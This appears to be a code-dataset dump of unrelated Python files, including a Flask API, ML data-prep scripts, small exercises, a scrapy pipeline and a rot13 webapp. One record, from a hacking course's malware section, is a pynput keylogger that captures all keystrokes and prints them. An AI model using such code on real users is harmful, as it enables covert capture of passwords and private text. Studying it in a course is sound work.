create_amenity_obj():\n \"\"\"creates a Amenity\"\"\"\n # request.get_json() - converts the JSON object into Python data\n kwargs = request.get_json()\n if not kwargs:\n return make_response(jsonify({'error': 'Not a JSON'}), 400)\n if 'name' not in kwargs:\n return make_response(jsonify({'error': 'Missing name'}), 400)\n # obj = class(**kwargs)\n amenity = Amenity(**kwargs)\n amenity.save()\n return make_response(jsonify(amenity.to_dict()), 201)\n\n\n@app_views.route('/amenities/', methods=['PUT'],\n strict_slashes=False)\ndef put_amenity_obj(amenity_id):\n \"\"\"update state obj by id\"\"\"\n amenity = storage.get(Amenity, amenity_id)\n if amenity is None:\n abort(404)\n if not request.get_json():\n return make_response(jsonify({'error': 'Not a JSON'}), 400)\n for key, value in request.get_json().items():\n setattr(amenity, key, value)\n amenity.save()\n return jsonify(amenity.to_dict())\n","sub_path":"api/v1/views/amenities.py","file_name":"amenities.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"385300510","text":"import json\n\nimport pandas as pd\n\nfrom DatasetUtils.SampleCreator import get_sample\nfrom FeatureEngineering.FeatureSelector import get_feature_selection\nfrom Learning.LearningUtils import get_dataset, get_testset\nfrom Preprocessing import Preprocessor\nfrom Utility.CSVUtils import load_data_from_CSV, save_df_as_csv\nfrom Utility.Util import get_root_directory\n\n\ndef join_label_and_group(data):\n \"\"\"\n joins tweet__fake and user__id\n :param data: \n :return: \n \"\"\"\n data_to_join = load_data_from_CSV(get_root_directory()+'/data/data_set_tweet_user_features.csv')\n data_to_join = data_to_join.reset_index(drop=True)\n data = data.reset_index(drop=True)\n data_to_join = data_to_join.reset_index(drop=True)\n\n data_to_join = data_to_join[['tweet__fake', 'user__id']]\n data = pd.concat([data_to_join, data], axis=1)\n print(\"Shape after join: {}\".format(data.shape))\n return data\n\n\ndef load_user_features(testset):\n \"\"\"\n loads user features from database and saves them\n :return: \n \"\"\"\n from Database.DatabaseHandler import DatabaseHandler\n data = DatabaseHandler.get_user_features_df(testset)\n print(data.shape)\n print(data.head())\n if testset:\n save_df_as_csv(data, \"users_testset.csv\")\n else:\n save_df_as_csv(data, \"users_12_07.csv\")\n\n\ndef join_users(testset):\n \"\"\"\n joins a csv file with the users on user ids\n :param testset: \n :return: \n \"\"\"\n if testset:\n user_data = load_data_from_CSV('../FeatureEngineering/users.csv')\n tweet_data = load_data_from_CSV('../FeatureEngineering/data_set_sample_features_final.csv')\n else:\n user_data = load_data_from_CSV('../FeatureEngineering/users.csv')\n tweet_data = load_data_from_CSV('../FeatureEngineering/data_set_sample_features_final.csv')\n\n cols_to_keep = list()\n for col in list(tweet_data.columns):\n if \"tweet__\" in col:\n cols_to_keep.append(col)\n\n tweet_data = tweet_data[cols_to_keep]\n\n print(tweet_data.shape)\n print(user_data.shape)\n\n data = pd.merge(tweet_data, user_data, how='left', left_on=['tweet__user_id'], right_on=['user__id'])\n if testset:\n save_df_as_csv(data, \"testdata/testset_tweet_user_features.csv\")\n else:\n save_df_as_csv(data, \"data_set_tweet_user_features.csv\")\n\n\ndef append_feature(feature_to_append, algo):\n \"\"\"\n appends a feature to a dataset\n :param feature_to_append: \n :param algo: \n :return: \n \"\"\"\n data = get_dataset(algo)\n data 
= data.reset_index(drop=True)\n\n feature = load_data_from_CSV(\"../data/data_set_tweet_user_features.csv\")[[feature_to_append]]\n\n data = pd.concat([data, feature], 1)\n return data\n\n\ndef append_feature_from_db(feature_to_append):\n \"\"\"\n appends a feature that was stored in the DB to the specified filename\n :param feature_to_append: \n :return: \n \"\"\"\n from Database.DatabaseHandler import DatabaseHandler\n\n data = load_data_from_CSV(\"data_set_tweet_user_features.csv\")\n print(\"drop \" + feature_to_append)\n data = data.drop(feature_to_append, 1)\n print(\"load \" + feature_to_append)\n data['tweet__'+feature_to_append] = data['tweet__id'].map(lambda x: DatabaseHandler.get_feature_by_tweet_id(feature_to_append, x))\n save_df_as_csv(data, \"data_set_tweet_user_features.csv\")\n\n\ndef concat_dfs(data, data_to_join):\n data_to_join = data_to_join.drop('tweet__id', 1)\n\n data = pd.concat([data, data_to_join], axis=1)\n print(data.shape)\n for col in data.columns:\n print(col + \" NaN: \" + str(data[col].isnull().values.any()))\n return data\n\n\ndef combine_data_sets():\n \"\"\"\n combines doc2vec, topic model, tweet and user feature vectors\n :param norm: \n :return: \n \"\"\"\n text_model_vector_dir = get_root_directory()+\"/data/text_data/\"\n topic_vector_dir = get_root_directory()+\"/data/topics_data/\"\n datasets = get_root_directory()+\"/data/\"\n\n doc2vec = dict()\n topics = dict()\n\n doc2vec['nb'] = \"d2v_models_300_0_20.csv\"\n # doc2vec['dt'] = \"d2v_models_200_0_20.csv\"\n doc2vec['dt'] = \"unigram_bow.csv\"\n doc2vec['svm'] = \"d2v_models_300_0_20.csv\"\n doc2vec['nn'] = \"d2v_models_100_0_20.csv\"\n doc2vec['xgb'] = \"d2v_models_300_0_20.csv\"\n # doc2vec['rf'] = \"data_set_300_0_20_d2v.csv\"\n doc2vec['rf'] = \"unigram_bow.csv\"\n\n\n topics['nb'] = \"data_topics_170.csv\"\n topics['dt'] = \"data_topics_170.csv\"\n topics['svm'] = \"data_topics_90.csv\"\n topics['nn'] = \"data_topics_190.csv\"\n topics['xgb'] = \"data_topics_90.csv\"\n topics['rf'] = \"data_topics_200.csv\"\n\n configs = ['nb','dt','nn','svm','xgb','rf']\n for conf in configs:\n text_model_vector = load_data_from_CSV(text_model_vector_dir+doc2vec[conf])\n text_model_vector = text_model_vector.reset_index(drop=True)\n\n tm_cols = [col for col in text_model_vector if 'tweet__id' not in col and 'user__id' not in col and 'tweet__fake' not in col]\n text_model_vector = text_model_vector[tm_cols]\n\n topic_vector = load_data_from_CSV(topic_vector_dir+topics[conf])\n topic_vector = topic_vector.reset_index(drop=True)\n\n data = load_data_from_CSV(get_root_directory()+\"/data/data_set_tweet_user_features.csv\")\n data = Preprocessor.replace_missing_possibly_sensitive(data)\n features = get_feature_selection(data)\n features.extend(['tweet__fake', 'user__id', 'tweet__id'])\n data = data[features]\n data = data.reset_index(drop=True)\n\n data = pd.concat([data, text_model_vector], axis=1)\n data = pd.concat([data, topic_vector], axis=1)\n\n print(data.shape)\n save_df_as_csv(data, datasets+'data_set_'+conf+'.csv')\n\ndef combine_testsets(testset_only=False):\n \"\"\"\n combines doc2vec, topic model, tweet and user feature vectors to build the testset. 
\n Does not include tweets that are shifted from the training data.\n :param testset_only: True if LDA and Doc2Vec models trained on testdata shoud be used\n :return: \n \"\"\"\n text_model_vector_dir = get_root_directory()+\"/data/text_data/\"\n topic_vector_dir = get_root_directory()+\"/data/topics_data/\"\n datasets = get_root_directory()+\"/data/testdata/\"\n\n doc2vec = dict()\n topics = dict()\n\n if testset_only:\n doc2vec['nb'] = \"d2v_models_testset_300_0_20.csv\"\n doc2vec['dt'] = \"testset_only_unigram_bow.csv\"\n doc2vec['svm'] = \"d2v_models_testset_300_0_20.csv\"\n doc2vec['nn'] = \"d2v_models_testset_100_0_20.csv\"\n doc2vec['xgb'] = \"d2v_models_testset_300_0_20.csv\"\n doc2vec['rf'] = \"testset_only_unigram_bow.csv\"\n\n topics['nb'] = \"data_testset_topics_170.csv\"\n topics['dt'] = \"data_testset_topics_170.csv\"\n topics['svm'] = \"data_testset_topics_90.csv\"\n topics['nn'] = \"data_testset_topics_190.csv\"\n topics['xgb'] = \"data_testset_topics_90.csv\"\n topics['rf'] = \"data_testset_topics_200.csv\"\n else:\n doc2vec['nb'] = \"testset_d2v_300.csv\"\n doc2vec['dt'] = \"testset_unigram_bow.csv\"\n doc2vec['svm'] = \"testset_d2v_300.csv\"\n doc2vec['nn'] = \"testset_d2v_100.csv\"\n doc2vec['xgb'] = \"testset_d2v_300.csv\"\n doc2vec['rf'] = \"testset_unigram_bow.csv\"\n\n clfs = ['nb','dt','nn','svm','xgb','rf']\n\n for clf in clfs:\n text_model_vector = load_data_from_CSV(text_model_vector_dir+doc2vec[clf])\n if testset_only:\n topic_vector = load_data_from_CSV(topic_vector_dir+topics[clf])\n data = load_data_from_CSV(get_root_directory()+\"/data/testdata/testset_tweet_user_features_complete.csv\")\n else:\n topic_vector = load_data_from_CSV(topic_vector_dir+'testset_topics_'+clf+'.csv')\n data = load_data_from_CSV(get_root_directory()+\"/data/testdata/testset_tweet_user_features.csv\")\n data = Preprocessor.replace_missing_possibly_sensitive(data)\n features = get_feature_selection(data)\n features.extend(['tweet__fake', 'user__id', 'tweet__id'])\n data = data[features]\n\n data = pd.concat([data, text_model_vector], axis=1)\n\n # for testset only topics won't be used, because no topics (with large number of topics) could be infered\n if not testset_only:\n data = pd.concat([data, topic_vector], axis=1)\n\n # print(data.index)\n print(data.shape)\n if testset_only:\n save_df_as_csv(data, datasets+'testset_only_'+clf+'.csv')\n else:\n save_df_as_csv(data, datasets+'testset_'+clf+'.csv')\n\n\ndef get_real_news_to_include():\n \"\"\"\n :return: ids that shifted into the testset \n \"\"\"\n with open(get_root_directory()+'/data/testdata/ids_include_in_testset.json') as json_data:\n d = json.load(json_data)\n return d\n\n\ndef append_all_attributes_not_in_data(data, data_with_features):\n \"\"\"\n Appends all attributes from 'data_with_features' which are not contained in 'data' to 'data'.\n Resets index!\n :param data: data to append\n :param data_with_features: data with additional attributes\n :return: \n \"\"\"\n data = data.reset_index(drop=True)\n print(\"data: {}\".format(data.shape))\n\n data_with_features = data.reset_index(drop=True)\n print(\"data_with_features: {}\".format(data.shape))\n\n count = 0\n for col in data_with_features.columns:\n if col not in data_with_features:\n data[col] = data_with_features[col]\n count += 1\n\n print(\"{} attributes appended.\".format(count))\n print(\"new data: {}\".format(data.shape))\n return data\n\ndef build_testset(all, clf_name, keep_all_features=False):\n if clf_name:\n train = get_dataset(clf_name)\n test = 
get_testset(clf_name)\n else:\n train = load_data_from_CSV(get_root_directory() + \"/data/data_set_tweet_user_features.csv\")\n test = load_data_from_CSV(get_root_directory() + \"/data/testdata/testset_tweet_user_features.csv\")\n\n features_to_extend = ['tweet__id', 'user__id', 'tweet__fake']\n if keep_all_features:\n tmp_features = [col for col in train.columns]\n else:\n tmp_features = get_feature_selection(train, all)\n\n tmp_features.extend(features_to_extend)\n train = train[tmp_features]\n test = test[tmp_features]\n\n ids = get_real_news_to_include()\n to_shift = train[train['tweet__id'].isin(ids)]\n train = train[~train['tweet__id'].isin(ids)]\n print(\"Shape train: {}\".format(train.shape))\n\n test = test.append(to_shift)\n test = test.reset_index(drop=True)\n print(\"Shape test: {}\".format(test.shape))\n return test\n\nif __name__ == \"__main__\":\n\n # load_user_features()\n # join_users()\n\n # combine datasets (tweet/user features, Doc2Vec/BOW, topics) to a dataset for each learner\n # combine_data_sets()\n\n # combine datasets (tweet/user features, Doc2Vec/BOW, topics) to a testset for each learner\n combine_testsets(testset_only=True)\n\n # create testset\n # data = build_testset(0, clf_name=None)\n # save_df_as_csv(data, '../data/testdata/testset_tweet_user_features_complete.csv')\n","sub_path":"DatasetUtils/DataSetCombiner.py","file_name":"DataSetCombiner.py","file_ext":"py","file_size_in_byte":11029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"25215904","text":"# 1부터 n까지의 합 구하기(ch1_sum_n.pyS)\n# 재귀 함수 활용하기\ndef sum_recursive(n):\n # n = 5\n # 5 + 4 + 3 + 2 + 1\n if n <= 1:\n return 1\n \n return n + sum_recursive(n-1)\n\nnumber = int(input('Enter a number sum-recursive: '))\nprint('sum-recursive', sum_recursive(number))\n\n# 숫자 n개 중에 최댓값 찾기(ch2_max.py)\n# 재귀 함수 활용하기\ndef max_recursive(li, idx):\n if (idx == 1): return li[0]\n max = max_recursive(li, idx-1)\n\n if (max > li[idx-1]): return max\n else: return li[idx-1]\n \na = [17,92,18,33,58,7,33,42,99]\nprint('max-recursive', max_recursive(a, len(a)))\n\n# if (idx == 1): return li[0]\n# max = max_recursive(li, idx-1)\n# 위 코드 2줄이, idx가 9->2 까지 재귀적으로 반복\n\n# idx == 2일 때 max 값이 li[0] 즉 17이 할당되고 아래 코드로 넘어감\n# 그리고 거꾸로 지금까지 중첩된 함수가 순차적으로 실행됨\n# idx가 거꾸로 2->9 까지 반복","sub_path":"algorithm/ch4_ex.py","file_name":"ch4_ex.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"273071766","text":"#!/usr/bin/python3\n\n\ndef fizzbuzz():\n\n x = 1\n\n while x <= 100:\n if (x % 5) == 0 and (x % 3) == 0:\n print(\"FizzBuzz \", end=\"\")\n\n elif (x % 3) == 0:\n print(\"Fizz \", end=\"\")\n\n elif (x % 5) == 0:\n print(\"Buzz \", end=\"\")\n\n else:\n print(\"{} \".format(x), end=\"\")\n\n x += 1\n","sub_path":"0x01-python-if_else_loops_functions/12-fizzbuzz.py","file_name":"12-fizzbuzz.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"122620485","text":"# -*- coding:utf-8 -*-\r\n# Author: washing\r\n# DateTime: 2021/11/7 10:40\r\n# File: 0598.py\r\n# Desc: \r\n\r\nclass Solution:\r\n def maxCount(self, m: int, n: int, ops: List[List[int]]) -> int:\r\n mm = m\r\n nn = n\r\n for a, b in ops:\r\n if a < mm:\r\n mm = a\r\n if b < nn:\r\n nn = b\r\n return 
mm*nn\r\n","sub_path":"Solutions/0598/0598.py","file_name":"0598.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"205866502","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 30 18:28:21 2021\n\n@author: rodrigo\n\"\"\"\n\n\nclass Jogador(object):\n def __init__(self,nome):\n self.name=nome\n self.vitorias=0\n self.derrotas=0\n self.n_tentativas_para_vencer=0\n \n def tenta_nova_letra(self):\n return input(f'{self.retorna_nome_jogador()} digite o teu palpite, uma letra da palavra secreta: ')\n \n def retorna_nome_jogador(self):\n return self.name\n \n def retorna_n_vitorias(self):\n return self.vitorias\n \n def retorna_n_derrotas(self):\n return self.derrotas\n \n def retorna_media_tentativas_para_ganhar(self):\n return self.n_tentativas_para_vencer/self.vitorias\n \n def atualiza_vitoria(self):\n self.vitorias+=1\n \n def atualiza_derrota(self):\n self.derrotas+=1\n \n def atualiza_n_tentativas_para_vencer(self,tentativas):\n self.n_tentativas_para_vencer+=tentativas\n \n \n def __str__(self):\n if self.vitorias>0:\n return (f'Nome: {self.name} - Vitórias: {self.vitorias} - Derrotas: {self.derrotas} - Média de tentativa para ganhar {self.n_tentativas_para_vencer/self.vitorias}')\n else:\n return (f'Nome: {self.name} - Vitórias: {self.vitorias} - Derrotas: {self.derrotas}')\n \nclass Jogador_Burro(Jogador):\n def __init__(self,nome):\n \n self.name=nome\n self.vitorias=0\n self.derrotas=0\n self.n_tentativas_para_vencer=0\n self.lista_Vogais=['A', 'I', 'O', 'E', 'U']\n self.lista_Consoantes=['R', 'N', 'C', 'L', 'T', 'M', 'S', 'B', 'G', 'D', 'P', 'H', 'V', 'J', 'F', 'K', 'Q', 'X', 'Z', 'W', 'Y']\n self.lista_letras_jogadas=[]\n \n def tenta_nova_letra(self,lista_letras_jogadas=[]):\n novas_letrar_para_tirar=[]\n \n for letra in lista_letras_jogadas:\n if letra not in self.lista_letras_jogadas:\n self.lista_letras_jogadas.append(letra)\n novas_letrar_para_tirar.append(letra)\n \n for letra in novas_letrar_para_tirar:\n if letra in self.lista_Vogais:\n self.lista_Vogais.remove(letra)\n if letra in self.lista_Consoantes:\n self.lista_Consoantes.remove(letra)\n \n if len(self.lista_Vogais)>0:\n letra_da_vez=self.lista_Vogais[0]\n self.lista_Vogais.remove(letra_da_vez)\n self.lista_letras_jogadas.append(letra_da_vez) \n print(f'\\nSou o robô {self.name}. Após calculos avançadosa letra certa é a vogal {letra_da_vez}')\n time.sleep(2)\n return letra_da_vez\n else:\n if len(self.lista_Consoantes)>0:\n letra_da_vez=self.lista_Consoantes[0]\n self.lista_Consoantes.remove(letra_da_vez)\n self.lista_letras_jogadas.append(letra_da_vez)\n print(f'\\nSou o robô {self.name}. Após calculos avançados a letra certa é a consoante {letra_da_vez}')\n time.sleep(2)\n return letra_da_vez\n else:\n print(f'\\nSou o robô {self.name}. 
Acabaram minhas letras')\n time.sleep(2)\n \n def reinicia_Robo(self):\n self.lista_Vogais=['A', 'I', 'O', 'E', 'U']\n self.lista_Consoantes=['R', 'N', 'C', 'L', 'T', 'M', 'S', 'B', 'G', 'D', 'P', 'H', 'V', 'J', 'F', 'K', 'Q', 'X', 'Z', 'W', 'Y']\n \n \n def atualiza_vitoria(self):\n self.vitorias+=1\n self.reinicia_Robo()\n \n def atualiza_derrota(self):\n self.derrotas+=1\n self.reinicia_Robo()\n \n \n\nJair=Jogador_Burro('Jair') \n\nfor i in range(26): \n letra=Jair.tenta_nova_letra(['R','W','O','N'])\n\n","sub_path":"robo_burro.py","file_name":"robo_burro.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"653711995","text":"# Author : Jackson Currie\n# Date : 2015-08-04\n# Description : Startup GUI for console and GUI\n\n# GUI library\nimport tkinter\n\n# Console game\nimport ConsoleGame\n\n# GUI game\nimport GUIGame\n\n# Opens visual game\ndef Visual():\n \n # Close GUI\n root.destroy()\n \n # Run visual game\n GUIGame.GetInputs()\n OpenGUI()\n\n# Runs console game\ndef Console():\n \n # Close GUI\n root.destroy()\n \n # Run console game\n try:\n ConsoleGame.Run()\n except KeyboardInterrupt:\n OpenGUI()\n\n# Run program\ndef OpenGUI():\n \n # Creating GUI\n global root\n root = tkinter.Tk()\n root.geometry(\"600x300+350+100\")\n root.title(\"Take-Away Game\")\n\n # Creating GUI widgets\n consoleGameButton = tkinter.Button(text=\"Play Console Game\", height='3', width='20', command=Console)\n visualGameButton = tkinter.Button(text=\"Play Visual Game\", height='3', width='20', command=Visual)\n # Setting GUI widgets\n visualGameButton.pack(side='right',expand=True)\n consoleGameButton.pack(side='left',expand=True)\n\n # GUI mainloop\n root.mainloop()\n\n# Run program\nOpenGUI()\n","sub_path":"TakeAwayGame - Python/StartScreen.py","file_name":"StartScreen.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"57637177","text":"import MeCab \nimport sys\nimport argparse\nmecab = MeCab.Tagger(\"Choi\")\n\nclass Vocabulary:\n def __init__(self,filename):\n self.fname = filename\n self.String2i = {}\n self.i2String = []\n if not self.fname is None:\n self.load_vocab()\n def stoi(self, word):\n if word in self.String2i:\n return self.String2i[word]\n return self.String2i['']\n def itos(self, id):\n if id < len(self.i2String):\n return self.i2String[id]\n return ''\n def append_letter(self,word):\n if word in self.String2i:\n return \n self.i2String.append(word)\n id = len(self.String2i) \n self.String2i[word] = id\n def load_vocab(self):\n self.append_letter('None')\n self.append_letter('')\n with open(self.fname,\"r\") as f:\n for line in f:\n line = line[:-3]\n line = str(line)\n node = mecab.parseToNode(line)\n while node:\n self.append_letter(node.surface)\n node = node.next\n def save_Vocab(self,vocabname):\n f = open(vocabname,\"w\")\n for line in self.i2String:\n f.write(line + \"\\n\")\n #### static load method #######\ndef load_from_file(filename):\n vocab = Vocabulary(None)\n with open(filename,\"r\") as f:\n for line in f:\n vocab.append_letter(line)\n return vocab\n \n \n","sub_path":"classification_mecab/dict.py","file_name":"dict.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"249429","text":"#!/usr/bin/env/ python\n#_*_ coding: utf8 _*_\n\nimport pynput.keyboard\n\ndef presiona(key):\n 
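# convertir() below normalizes the pynput key object: an ordinary KeyCode
# yields its character, while special keys fall back to their str() form
# such as 'Key.esc'.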
key1 = convertir(key)\n print(\"Tecla presionada: {}\".format(key1))\n\ndef libera(key):\n key1 = convertir(key)\n print(\"Tecla liberada: {}\".format(key1))\n \n if str(key) == \"Key.esc\":\n print(\"Saliendo...\")\n return False\n\ndef convertir(key):\n if isinstance(key, pynput.keyboard.KeyCode):\n return key.char\n else:\n return str(key)\n\nwith pynput.keyboard.Listener(on_press=presiona, on_release=libera) as listen:\n listen.join()","sub_path":"Udemy/Completado_Master_en_Hacking_con_Python_Vuelvase_un_Hacker_Etico/Seccion_22_Malware_con_Python/117_Creacion_de_Keyloggers_p1_Const_el_esqueleto_Keylogger/keylogger.py","file_name":"keylogger.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"232914494","text":"# import packages/modules\nimport webapp2\nimport codecs\nimport cgi\n\n# creates a form for submitting text to rot13\nform = \"\"\"\n
<form method=\"post\">\n ROT13\n <br>\n <textarea name=\"text\">%(text)s</textarea>\n <br>\n <input type=\"submit\">\n</form>
\n\"\"\"\n\n\n# method used to escape characters like > < & \"\ndef escape_html(s): \n\treturn cgi.escape(s, quote = True)\n\t\n# used to perform rot13 \ndef rot13(s):\n\treturn codecs.encode(s, 'rot13')\n\n# main handler to do get and post method\nclass MainPage(webapp2.RequestHandler):\n\t# used to write previous form\n\tdef write_form(self, text=\"\"):\n\t\tself.response.out.write(form % {'text' : escape_html(text)})\n \n\t# gets form\n\tdef get(self):\n\t\tself.write_form()\n \n\t# post data to form\n\tdef post(self):\n\t\tuser_text = self.request.get('text')\n\t\tself.write_form(rot13(user_text))\n\n\napplication = webapp2.WSGIApplication([\n ('/', MainPage)\n], debug=True)\n","sub_path":"rot13.py","file_name":"rot13.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"584919421","text":"# pendul_3d.py : integrate swing of a pendulum\r\n\r\nfrom pylab import *\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n# set initial conditions\r\n\r\ntheta_max=input('starting angle? (in deg) ')\r\ntheta_max = radians(theta_max)\r\nmethod = -1\r\nwhile method != 1 and method != 2 :\r\n method = input('method? (1: Euler, 2: Verlet) ')\r\n\r\nomega_init = 0.0 # start from rest\r\ng_L = 1.0 # constant g/L set =1\r\nL = 1.0\r\ndelta_t = 2.0*pi/100.0 # note period is 2*pi\r\n\r\ntheta=[]\r\nomega=[] # angular velocity\r\ntheta.append(theta_max)\r\nomega.append(omega_init)\r\nt = arange(0.0,9.0*pi,delta_t)\r\n\r\nfor i in range(0,len(t)-1) :\r\n alpha = -g_L * sin(theta[i])\r\n if method == 1 : # Euler's simple method\r\n theta.append(theta[i] + omega[i] * delta_t)\r\n omega.append(omega[i] + alpha * delta_t)\r\n else : # Verlet's method\r\n if i==0 : # first backwards step\r\n theta.append(theta[i] + alpha / 2.0 * delta_t**2)\r\n else :\r\n theta.append(2.0 * theta[i] - theta[i-1] + alpha * delta_t**2)\r\n\r\nx = L * sin(theta)\r\ny = -L * cos(theta)\r\ntheta = degrees(theta)\r\n\r\nfig = figure()\r\nax = fig.gca(projection='3d')\r\nax.plot(t,x,y,lw=2,label='numerical')\r\nax.legend()\r\nxlabel('t')\r\nylabel('x')\r\nax.set_zlabel('y')\r\n#grid('on')\r\nrcParams.update({'font.size': 20})\r\nshow()\r\n\r\n\r\n","sub_path":"Python2/Physics 240/HW6/pendul_3d.py","file_name":"pendul_3d.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"465899751","text":"import json\nimport scrapy\nfrom scrapy.exceptions import DropItem\n\nclass LyricsPipeline(object):\n \n def process_item(self, item, spider):\n if item['up']:\n item['lastWeekRank'] = str(int(item['thisWeekRank'])-int(item['up'][1:]))\n return item\n else:\n raise DropItem(\"Song %s does not rise in ranking\" % item)\n\n \nclass JsonWriterPipeline(object):\n \n def open_spider(self, spider):\n self.file = open('processed_data.json','w')\n \n def close_spider(self,spider):\n self.file.close()\n \n def process_item(self, item, spider):\n line = json.dumps(dict(item)) + \"\\n\"\n self.file.write(line)\n return item\n\n\nfrom scrapy.pipelines.images import ImagesPipeline\n\nclass MyImagesPipeline(ImagesPipeline): #Be careful about what to be inherited here!!!\n \n def get_media_requests(self,item,info):\n for url in item['images_urls']:\n yield scrapy.Request(url)\n \n def item_completed(self,results,item,info):\n # each result is an (ok, info) tuple; info['path'] holds the stored image path\n image_paths = [x['path'] for ok, x in results if ok]\n print(image_paths)\n if not image_paths:\n raise DropItem(\"Song has no cover\")\n item['images'] = 
image_paths\n return item","sub_path":"tutorial_final/131/lyrics/lyrics/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"144671725","text":"import tempfile\nimport unittest\n\nfrom agg import aggregate, split_music, leven_music\n\nclass TestAggregate(unittest.TestCase):\n def test_aggregate(self):\n kyoku_list = ['恋をしよーよ', '観覧車', '仇花', 'タイムマシン']\n #kyoku_list = ['恋をしよーよ']\n actual = aggregate(kyoku_list) \n self.assertEqual(actual, {'恋をしよーよ': 1, 'タイムマシン': 1, '観覧車': 1, '仇花': 1})\n #self.assertEqual(actual, {'恋をしよーよ': 1})\n\n def test_aggregate2(self):\n kyoku_list = ['恋をしよーよ', '観覧車', 'タイムマシン', '仇花', 'タイムマシン']\n actual = aggregate(kyoku_list) \n self.assertEqual(actual, {'恋をしよーよ': 1, 'タイムマシン': 2, '観覧車': 1, '仇花': 1})\n\n def test_aggregate_0(self):\n kyoku_list = []\n actual = aggregate(kyoku_list) \n self.assertEqual(actual, {})\n\n\nclass TestSplitMusic(unittest.TestCase):\n def test_split_music(self):\n with tempfile.NamedTemporaryFile(mode='w') as f:\n f.write(\"\"\"アマオト,Platonic syndrome,二人色\nアマオト,ロケット☆ライド,観覧車\nラムネ,ロケット☆ライド,Welcome☆Berry's\n\"\"\")\n f.flush()\n #actual1, actual2, actual3 = split_music('test_data1.txt')\n actual1, actual2, actual3 = split_music(f.name)\n self.assertEqual(actual1, ['アマオト', 'アマオト', 'ラムネ'])\n self.assertEqual(actual2, ['Platonic syndrome', 'ロケット☆ライド', 'ロケット☆ライド'])\n self.assertEqual(actual3, ['二人色', '観覧車', \"Welcome☆Berry's\"])\n\n\nclass TestLevenMusic(unittest.TestCase):\n def test_leven_music(self):\n music_list1 = {'こいをしよーよ': 1, 'ロケット☆ライド': 1, 'ロケットライド': 1, \"Wlcome Berry's\" :1, '観覧車': 1}\n acutual = leven_music(music_list1)\n self.assertEqual(acutual, {'恋をしよーよ': 1, 'ロケット☆ライド': 2, \"Welcome☆Berry's\": 1, '観覧車': 1})\n\n def test_leven_music_keisan(self):\n music_list1 = {'こいをしよーよ': 1, 'ロケット☆ライド': 3, 'ロケットライド': 1, \"Wlcome Berry's\": 1, '観覧車': 2}\n acutual = leven_music(music_list1)\n self.assertEqual(acutual, {'恋をしよーよ': 1, 'ロケット☆ライド': 4, \"Welcome☆Berry's\": 1, '観覧車': 2})\n\n def test_leven_music_zero(self):\n music_list1 = {'こいをしよーよ': 0, 'ロケット☆ライド': 0, \"Wlcome Berry's\": 0, '観覧車': 0}\n acutual = leven_music(music_list1)\n self.assertEqual(acutual, {'恋をしよーよ': 0, 'ロケット☆ライド': 0, \"Welcome☆Berry's\": 0, '観覧車': 0})\n\n def test_leven_music_list_none(self):\n music_list1 = {'こいをしよーよ': 0, 'ロケット☆ライド': 0, \"Wlcome Berry's\": 0, '観覧車': 0}\n acutual = leven_music(music_list1)\n self.assertEqual(acutual, {'恋をしよーよ': 0, 'ロケット☆ライド': 0, \"Welcome☆Berry's\": 0, '観覧車': 0})","sub_path":"aggregate_duca/tests/test_agg.py","file_name":"test_agg.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"494260814","text":"# -*- coding: ISO-8859-1 -*-\nimport os\n\n\nclass DiskWalk(object):\n def __init__(self, path):\n self.path = path\n\n def enumerate_path(self):\n path_collection = []\n for dirpath, dirnams, filenames in os.walk(self.path):\n for file in filenames:\n fullpath = os.path.join(dirpath, file)\n path_collection.append(fullpath)\n\n return path_collection\n\n def enumerate_files(self):\n files_collection = []\n for dirpath, dirnames, filenames in os.walk(self.path):\n for file in filenames:\n files_collection.append(file)\n return files_collection\n\n def enumerate_dir(self):\n dirs_collection = []\n for dirpath, dirnames, filenames in os.walk(self.path):\n for dir in dirnames:\n dirs_collection.append(dir)\n return 
dirs_collection\n\n","sub_path":"directory_walk.py","file_name":"directory_walk.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"303136477","text":"from __future__ import print_function\nimport base64\nimport json\nimport traceback\nimport os\nimport sys\nimport web\nimport api_base\nfrom armada_command.consul.consul import consul_query\nfrom armada_command.docker_utils.images import ArmadaImage\nfrom armada_command.dockyard.alias import INSECURE_REGISTRY_ERROR_MSG\nimport docker_client\n\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..'))\n\nLENGTH_OF_SHORT_CONTAINER_ID = 12\n\n\ndef print_err(*objs):\n print(*objs, file=sys.stderr)\n\n\nclass Run(api_base.ApiCommand):\n def run_container(self, image_path, dockyard_user, dockyard_password, dict_ports, dict_environment, dict_volumes,\n run_command):\n exception_msg = \"\"\n try:\n restart_parameters = {'image_path': image_path,\n 